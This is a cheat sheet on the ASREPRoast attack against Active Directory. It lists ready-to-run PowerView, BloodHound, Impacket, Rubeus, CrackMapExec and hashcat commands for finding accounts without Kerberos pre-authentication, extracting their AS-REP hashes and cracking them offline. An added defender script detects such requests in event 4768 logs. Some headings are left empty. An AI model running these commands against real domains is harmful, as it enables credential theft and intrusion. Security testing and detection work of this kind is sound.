
ASREPRoast


Tools: Rubeus, Impacket-GetNPUsers


Find ASREPRoastable users (need creds)

1) Powerview

Get-DomainUser -PreauthNotRequired -Properties SamAccountName

2) Bloodhound Cypher Query

MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p

Find ASREP hash

Impacket-GetNPUsers DOMAIN/ -usersfile USERNAMES.TXT -format hashcat -dc-ip DC_IP -dc-host DC.DOMAIN.LOCAL -outputfile HASHES.DOMAIN.TXT

Rubeus.exe asreproast /format:hashcat

ASREPRoast is possible when a user account has the "Does not require Pre-Authentication" setting enabled.

This means a requester does not need to provide valid identification before requesting a Kerberos ticket for that user account.
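From the defender's side, this behaviour is visible on the domain controller: Windows Security event 4768 records the pre-authentication type of every TGT request. The following is an added example, not part of the original page, that flags successful requests with PreAuthType 0 and groups them by source; the sample records, the threshold and the function names are assumptions made for illustration.

```python
from collections import defaultdict

# Constructed sample records using field names from Security event 4768
# (a Kerberos TGT was requested). These are not real logs.
EVENTS = [
    {"TargetUserName": "alice", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.0.2.20"},
    {"TargetUserName": "svc_backup", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.0.2.50"},
    {"TargetUserName": "VPN114user", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.0.2.50"},
    {"TargetUserName": "legacy_app", "PreAuthType": "0", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.0.2.31"},
    {"TargetUserName": "WS01$", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.0.2.40"},
    {"TargetUserName": "nosuchuser", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x6", "IpAddress": "::ffff:10.0.2.50"},
]

# Encryption types weaker than AES, worth calling out in a finding.
WEAK_ETYPES = {"0x1": "DES-CBC-CRC", "0x3": "DES-CBC-MD5", "0x17": "RC4-HMAC"}


def find_no_preauth_requests(events):
    """Return successful TGT requests that were issued without pre-authentication."""
    hits = []
    for ev in events:
        # Status 0x0 = ticket issued; PreAuthType 0 = no pre-authentication data sent.
        if ev["Status"] != "0x0" or ev["PreAuthType"] != "0":
            continue
        hits.append({
            "user": ev["TargetUserName"],
            "source": ev["IpAddress"].split("::ffff:")[-1],  # strip IPv4-mapped prefix
            "weak_etype": WEAK_ETYPES.get(ev["TicketEncryptionType"].lower()),
        })
    return hits


def sources_hitting_many_accounts(hits, threshold=2):
    """Group hits by source; one host requesting for several accounts suggests a sweep."""
    by_source = defaultdict(set)
    for hit in hits:
        by_source[hit["source"]].add(hit["user"])
    return {s: sorted(u) for s, u in by_source.items() if len(u) >= threshold}


if __name__ == "__main__":
    hits = find_no_preauth_requests(EVENTS)
    for hit in hits:
        print(hit)
    print("multi-account sources:", sources_hitting_many_accounts(hits))
```

Accounts that surface here are the ones whose pre-authentication exemption should be reviewed and removed where nothing depends on it.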

Requirements:

Accounts with the attribute DONT_REQ_PREAUTH (PowerView: Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose)

You can also do:

1) Gather domain accounts in a list

2)

Enumeration (Need domain credentials)

Windows

Linux

Method: Impacket GetNPUsers

Enumerate Users

Request AS-REP

It is possible to force DES if it is allowed.

Alternate Method: CrackMapExec

  • crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asrep

Alternate Method: ASREPRoast PowerShell module (https://github.com/HarmJ0y/ASREPRoast)

  • Get-ASREPHash -Username VPN114user -verbose

More tools:

1) Snaffler

2) Lazagne

3) Seatbelt

Asreproasting

| Command | Description |
| --- | --- |
| .\Rubeus.exe asreproast /outfile:asrep.txt | Used to perform the Asreproast attack and save the extracted tickets to a file. |
| hashcat -m 18200 -a 0 asrep.txt passwords.txt --force | Uses hashcat to crack AS-REP hashes that were saved in a file. |
